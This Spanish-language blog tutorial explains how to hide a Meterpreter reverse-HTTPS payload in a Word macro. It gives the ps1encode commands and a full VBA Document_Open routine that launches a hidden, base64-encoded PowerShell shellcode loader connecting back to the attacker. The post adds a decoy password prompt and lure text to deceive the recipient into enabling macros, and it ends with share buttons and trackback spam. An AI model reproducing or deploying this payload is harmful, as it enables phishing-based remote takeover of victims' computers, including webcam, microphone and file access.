El curso del Hacker

www.elcursodelhacker.com

HACKING ÉTICO & CIBERSEGURIDAD

Como ocultar un payload en un documento de Word

Esta vez te hablaré de un tema muy interesante, te diré a detalle como ocultar un payload en un documento de Word, con esto podrás descargar, modificar los archivos del usuario, obtener acceso al micrófono, la webcam, escalar privilegios, grabar la pantalla, etc.

Para lograr realizar esta tarea recurriremos al uso de las macros de Word, si eres nuevo en este tema, te daré una breve explicación para que tengas una visión más amplia de cómo funciona esto.

Una macro es un conjunto de acciones o comandos que se pueden ejecutar las veces que el usuario lo desee para automatizar sus tareas o trabajos, Word incluye Microsoft Visual Basic para aplicaciones (VBA) para que podamos crear las macros, pero en este caso nosotros incrustaremos una carga útil que nos dará el acceso al ordenador del usuario que le enviaremos el documento de Word.

> Haré mucho más interesante este artículo con unas cuantas líneas de código que se me ocurrió implementar en la macro para hacer menos sospechoso esta prueba de intrusión.

> Word no es el único que incluye VBA, esto también lo encontraremos en Excel y PowerPoint, así que, si deseas realizar esto también con uno de estos documentos, te funcionará perfectamente.

DESCARGAR E INSTALAR PS1ENCODE

El primer paso que haremos es descargar una herramienta que nos permita crear la carga útil, el nombre del script que utilizaremos es ps1encode, la instalación es bastante rápida.

$ git clone https://github.com/CroweCybersecurity/ps1encode

$ cd ps1encode

$ ./ps1encode.rb

Clonamos el repositorio de github con git clone https://github.com/CroweCybersecurity/ps1encode, después cambiamos de directorio con el comando cd ps1encode, para ejecutar el script teclea lo siguiente ./ps1encode.rb

Perfecto, ahora veamos algunos parámetros, la herramienta ya incluye un ejemplo, los datos que tienes que tener a la mano es tu dirección IP, si quieres realizar el ataque fuera de la red local necesitas saber tu dirección IP pública y dejar un puerto abierto en tu modem o enrutador, en este ejemplo lo vamos a hacer dentro de la red local, para saber tu IP abre una nueva terminal e ingresa el siguiente comando ifconfig.

USO DE PS1ENCODE

El objetivo es un sistema operativo Windows, utilizaremos un https reverso para recibir las conexiones, el puerto que elegiré es el 443, tu puedes escoger otro y recuerda que generaremos una carga útil para visual basic para aplicaciones (VBA), lo que te he comentado en la introducción.

./ps1encode.rb -i tudireccionip -p elpuerto -a windows/meterpreter/reverse_https -t vba

Una vez tengamos generada la carga útil, copiaremos todo el código correspondiente, en este caso comenzaremos por stringA = “power” hasta Shell stringFinal, 0 el resto no te servirá de nada.

Llego el turno de Metasploit, tienes que ponerlo a la escucha para que pueda recibir la conexión del usuario objetivo, solo ingresa los parámetros correctos, te daré una referencia.

INCRUSTAR LA CARGA ÚTIL EN VBA DE WORD

Hasta el momento vamos muy bien, abre un nuevo documento de Word, puedes agregar algún texto que invite al usuario a habilitar las macros, por ejemplo: “HABILITA LAS MACROS PARA ACCEDER A LA INFORMACIÓN CONFIDENCIAL”.

Dirígete en la pestaña Desarrollador, si no lo encuentras, puedes agregarlo marcando la casilla Desarrollador, para esto da clic en Archivo en la parte superior izquierda, Opciones y Personalizar cinta de opciones, selecciona la casilla correspondiente; da clic en Visual Basic para continuar con el siguiente paso.

Presiona en ThisDocument, llego el momento de copiar la carga útil, pero antes de hacerlo tienes que unirlo con otra pequeña línea de código que he creado, te lo compartiré para que puedas copiarlo.

Private Sub Document_Open()

Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")

If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
 Selection.Delete
 Dim rngFormat As Range
 Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
 With rngFormat
 .InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
 .InsertParagraphAfter
 With .Font
 .Name = "Tahoma"
 .Size = 24
 .Bold = True
 End With
 End With
 With ActiveDocument.Paragraphs(1)
 .Alignment = wdAlignParagraphCenter
 .SpaceAfter = InchesToPoints(0.5)
 End With
 ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If

End Sub

Todo el código que copiaste de ps1encode, lo pegaras antes de End Sub, te dejaré el ejemplo para que no comentas un error de sintaxis.

Private Sub Document_Open()

Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")

If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
 Selection.Delete
 Dim rngFormat As Range
 Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
 With rngFormat
 .InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
 .InsertParagraphAfter
 With .Font
 .Name = "Tahoma"
 .Size = 24
 .Bold = True
 End With
 End With
 With ActiveDocument.Paragraphs(1)
 .Alignment = wdAlignParagraphCenter
 .SpaceAfter = InchesToPoints(0.5)
 End With
 ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If

stringA = "power"
stringB = "shell.exe -NoE -NoP -NonI -W Hidden -E "
            
string0 = "JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAH"
string1 = "MAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj"
string2 = "ACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALA"
string3 = "AgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA"
string4 = "dABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG"
string5 = "4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAw"
string6 = "ADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAAzADEALAAwAHgAZg"
string7 = "BmACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAA"
string8 = "ZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4AD"
string9 = "UALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgAMwAx"
string10 = "ACwAMAB4AGYAZgAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANA"
string11 = "AsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIA"
string12 = "LAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxAC"
string13 = "wAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAs"
string14 = "ADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALA"
string15 = "AwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwA"
string16 = "MAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgANQA5ACwAMAB4ADUANAAsADAAeAA1ADYALAAwAHgANQAxACwAMAB4ADcANwAsADAAeAA3ADgALAAwAHgAMwA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgAMwA2ACwAMAB4ADcAOQAsADAAeAA0ADYALAAwAHgANAAxACwAMAB4ADUAOQAsAD"
string17 = "AAeAA1ADEALAAwAHgANAAxACwAMAB4ADMANQAsADAAeAAzADAALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADQAYwAsADAAeAA1ADAALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeAA2ADIALAAwAHgAMgBkACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAw"
string18 = "AHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADgALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMA"
string19 = "B4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAA"
string20 = "eAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAH"
string21 = "gAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4"
string22 = "AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeA"
string23 = "A2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgA"
string24 = "NgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4AD"
string25 = "AANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAz"
string26 = "ADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwA1ACwAMAB4ADMANgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADEALAAwAHgAMAAwADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJA"
string27 = "BzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsA"
string28 = "KwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AF"
string29 = "MAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABl"
string30 = "AHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQ"
string31 = "ByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8A"
string32 = "dwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA=="

stringFinal = stringA + stringB + string0 + string1 + string2 + string3 + string4 + string5 + string6 + string7 + string8 + string9 + string10 + string11 + string12 + string13 + string14 + string15 + string16 + string17 + string18 + string19 + string20 + string21 + string22 + string23 + string24 + string25 + string26 + string27 + string28 + string29 + string30 + string31 + string32

    Shell stringFinal, 0

End Sub

Eso es todo, ahora solo copia todo ese código en el documento en blanco que tienes abierto, cuanto termines de hacer lo que te dije, ciérralo.

El último paso es guardar el archivo, la extensión que tienes que elegir debe permitir el uso de las macros, nosotros seleccionaremos Documento habilitado para macros .docm, puedes elegir como alternativa Documento de Word 97-2003 .doc.

EJECUCIÓN DE LA MACRO

Observemos como se ve el archivo al momento de abrirlo, en la parte superior del texto aparecerá un botón “Habilitar contenido”, si el usuario le da clic, nosotros ya tendremos acceso remoto, esto lo puedes comprobar viendo tu terminal.

Para despistar sospechas le mostrará el resto de macros, le solicitará una clave para que pueda visualizar la información que contiene el documento, en este caso es “elcursodelhacker”.

Si la clave es correcta verá la información que nosotros le hemos indicado, tu puedes modificar el texto que verás a continuación, esto es solo un ejemplo.

En caso contrario, si la clave introducida es incorrecta le mostrará el siguiente texto en el documento.

SESIÓN OBTENIDA CON METASPLOIT FRAMEWORK

En la siguiente captura de pantalla, puedes comprobar que efectivamente ya tenemos una sesión en línea, si dominas Metasploit ya sabes que podemos hacer con el equipo comprometido.

Veamos qué sistema operativo es, tecleamos el siguiente comando sysinfo, se trata de un Windows 10; la explicación lo dejaremos hasta aquí, espero te haya sito útil.

Si tienes errores al instalar el script, probablemente es porque el desarrollador de la herramienta lo ha eliminado de su repositorio, tus dudas puedes dejarlo en la caja de comentarios.

¡Si te gusta el contenido, no olvides compartirlo en tus redes sociales! 

Share on facebook
Facebook
Share on twitter
Twitter
Share on whatsapp
WhatsApp
Share on linkedin
LinkedIn
Share on telegram
Telegram
Alexi A.C.V

Alexi A.C.V

¿TE HA SIDO ÚTIL ESTÁ PUBLICACIÓN?

Notificarme de:
Notificarme de
guest
Opcional
5 Comentarios
Ver comentarios más antiguos
Ver comentarios más recientes Ver comentarios más votados
Comentarios en línea
Ver todos los comentarios
trackback
2 meses atrás

… [Trackback]

[…] Here you will find 74596 more Information on that Topic: elcursodelhacker.com/como-ocultar-un-payload-en-un-documento-de-word/ […]

trackback
2 meses atrás

… [Trackback]

[…] Info on that Topic: elcursodelhacker.com/como-ocultar-un-payload-en-un-documento-de-word/ […]

trackback
1 mes atrás

… [Trackback]

[…] Read More on on that Topic: elcursodelhacker.com/como-ocultar-un-payload-en-un-documento-de-word/ […]

trackback
27 días atrás

… [Trackback]

[…] There you can find 45392 more Information on that Topic: elcursodelhacker.com/como-ocultar-un-payload-en-un-documento-de-word/ […]

trackback
26 días atrás

… [Trackback]

[…] Find More on that Topic: elcursodelhacker.com/como-ocultar-un-payload-en-un-documento-de-word/ […]

Maltego: Recopila información de tus objetivos
Seeker: Rastrea dispositivos con exactitud
Como crear un diccionario de contraseñas con Crunch
Como ocultar un payload en un documento de Word
5
0
¿Tienes dudas?, coméntanoslo.x
()
x

¿Quieres acceder a más contenido gratuito sobre hacking?

Sígueme en mi cuenta de Arthii, encontrarás más publicaciones gratis, también estaré compartiendo más contenido.